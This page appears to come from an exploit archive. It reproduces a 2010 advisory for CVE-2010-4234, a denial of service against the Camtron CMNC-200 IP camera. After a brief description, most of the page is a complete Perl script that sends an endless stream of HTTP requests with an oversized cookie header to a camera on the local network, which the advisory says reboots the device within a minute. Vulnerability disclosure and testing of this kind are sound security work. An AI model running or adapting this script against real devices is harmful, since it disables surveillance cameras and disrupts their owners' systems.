Skip to content
cyberexploits
doshardwaretext

Camtron CMNC-200 IP Camera - Denial of Service

Camtron CMNC-200 IP Camera - Denial of Service

Published on 2010-11-13

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/hardware/dos/15508.txt7eac4c3a
raw
Finding 5: Camera Denial of Service

CVE: CVE-2010-4234



The CMNC-200 IP Camera has a built-in web server that

is vulnerable to denial of service attacks. Sending multiple

requests in parallel to the web server may cause the camera

to reboot.



Requests with long cookie header makes the IP camera reboot a few

seconds faster, however the same can be accomplished with requests

of any size.



The example code below is able to reboot the IP cameras in

less than a minute in a local network.



#!/usr/bin/perl



use LWP::UserAgent;



while (1 == 1){



$ua = new LWP::UserAgent;

$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US;

rv:1.8.1.6)");



$req = HTTP::Request->new(GET => 'http://192.168.10.100');

$req->header(Accept =>

"text/xml,application/xml,application/xhtml+xml,text/html

;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5");

$req->header("Keep-Alive" => 0);

$req->header(Connection => "close");

$req->header("If-Modified-Since" => "Mon, 12 Oct 2009

02:06:34 GMT");

$req->header(Cookie =>

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");

my $res = $ua->request($req);



}
View on GitHub